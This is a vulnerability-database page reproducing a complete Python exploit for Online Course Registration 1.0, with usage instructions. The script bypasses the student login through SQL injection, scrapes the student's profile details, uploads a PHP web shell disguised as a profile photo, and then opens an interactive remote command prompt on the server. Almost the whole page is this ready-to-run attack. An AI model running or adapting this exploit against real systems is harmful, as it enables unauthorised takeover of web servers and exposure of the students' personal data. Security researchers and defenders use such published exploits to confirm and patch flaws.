Vulners
Lucene search
Online Course Registration 1.0 - Unauthenticated Remote Code Execution
# Exploit Title: Online Course Registration 1.0 - Unauthenticated Remote Code Execution
# Exploit Author: Bobby Cooke
# Credit to BKpatron for similar Auth Bypass on admin page - exploit-db.com/exploits/48559
# Date: 2020-07-15
# Vendor Homepage: Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 | Python 2.7.18
import requests, sys, urllib, re
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
ok = Fore.GREEN+'['+Fore.RESET+'+'+Fore.GREEN+']'+Fore.RESET+' '
err = Fore.RED+'['+Fore.RESET+'!'+Fore.RED+']'+Fore.RESET+' '
info = Fore.BLUE+'['+Fore.RESET+'-'+Fore.BLUE+']'+Fore.RESET+' '
RS = Style.RESET_ALL
FR = Fore.RESET
YL = Fore.YELLOW
RD = Fore.RED
def webshell(SERVER_URL, session):
try:
WEB_SHELL = SERVER_URL+'studentphoto/kaio-ken.php'
getdir = {'telepathy': 'echo %CD%'}
r2 = session.post(url=WEB_SHELL, data=getdir, verify=False)
status = r2.status_code
if status != 200:
print(err+"Could not connect to the webshell.")
r2.raise_for_status()
print(ok+'Successfully connected to webshell.')
cwd = re.findall('[CDEF].*', r2.text)
cwd = cwd[0]+"> "
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
print(RD+')'+YL+'+++++'+RD+'['+FR+'=========>'+' WELCOME BOKU '+'<========'+RD+']'+YL+'+++++'+RD+'('+FR)
while True:
thought = raw_input(term)
command = {'telepathy': thought}
r2 = requests.get(WEB_SHELL, params=command, verify=False)
status = r2.status_code
if status != 200:
r2.raise_for_status()
response2 = r2.text
print(response2)
except:
print('\r\n'+err+'Webshell session failed. Quitting.')
quit()
def formatHelp(STRING):
return Style.BRIGHT+Fore.RED+STRING+Fore.RESET
def header():
SIG = RD+' /\\\n'+RS
SIG += YL+'/vvvvvvvvvvvv '+RD+'\\'+FR+'--------------------------------------,\n'
SIG += YL+'`^^^^^^^^^^^^'+RD+' /'+FR+'============'+RD+'BOKU'+FR+'====================="\n'
SIG += RD+' \/'+RS+'\n'
return SIG
if __name__ == "__main__":
print(header())
if len(sys.argv) != 2:
print(formatHelp("(+) Usage:\t python %s <WEBAPP_URL>" % sys.argv[0]))
print(formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/Online Course Registration/'" % sys.argv[0]))
quit()
SERVER_URL = sys.argv[1]
if not re.match(r".*/$", SERVER_URL):
SERVER_URL = SERVER_URL+'/'
LOGIN_URL = SERVER_URL+'index.php'
PROFILE_URL = SERVER_URL+'my-profile.php'
print(info+'Creating session and saving PHPSESSID')
s = requests.Session()
get_session = s.get(SERVER_URL, verify=False)
if get_session.status_code == 200:
print(ok+'Successfully connected to server and created session.')
print(info+get_session.headers['Set-Cookie'])
else:
print(err+'Cannot connect to the server and create a web session.')
bypass_data = {'regno' : '\' or 1=1; -- boku', 'password' : '\' or 1=1; -- boku', 'submit' : ''}
print(info+'Bypassing authentication of student login portal.')
auth_bypass = s.post(url=LOGIN_URL, data=bypass_data, verify=False)
if auth_bypass.history:
for resp in auth_bypass.history:
print(info+'Response Status-Code: ' + str(resp.status_code))
print(info+'Location: ' + str(resp.headers['location']))
redirectURL = resp.headers['location']
if re.match(r".*change-password.php", redirectURL):
print(ok+'Successfully bypassed user portal authentication.')
else:
print(err+'Failed to bypass user portal authentication. Quitting.')
quit()
get_profile = s.get(url=PROFILE_URL, verify=False)
Name = str(re.findall(r'name="studentname" value=".*"', get_profile.text))
Name = re.sub('^.*name="studentname" value="', '', Name)
Name = re.sub('".*$', '', Name)
PinCode = str(re.findall(r'name="Pincode" readonly value=".*"', get_profile.text))
PinCode = re.sub('^.*name="Pincode" readonly value="', '', PinCode)
PinCode = re.sub('".*$', '', PinCode)
RegNo = str(re.findall(r'name="studentregno" value=".*"', get_profile.text))
RegNo = re.sub('^.*name="studentregno" value="', '', RegNo)
RegNo = re.sub('".*$', '', RegNo)
print(ok+'{studentname:'+Name+', Pincode:'+PinCode+', studentregno:'+RegNo+'}')
avatar_img = {
'photo':
(
'kaio-ken.php',
'<?php echo shell_exec($_REQUEST["telepathy"]); ?>',
'image/png',
{'Content-Disposition': 'form-data'}
)
}
upld_data = {'studentname':Name, 'studentregno':RegNo,'Pincode':PinCode,'cgpa':'0.00','submit':''}
webshell_upload = s.post(url=PROFILE_URL, files=avatar_img, data=upld_data, verify=False)
print(ok+'Uploaded webshell. Now connecting via POST requests using telepathy.')
webshell(SERVER_URL, s)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jul 2020 00:00Current
7.4High risk
Vulners AI Score7.4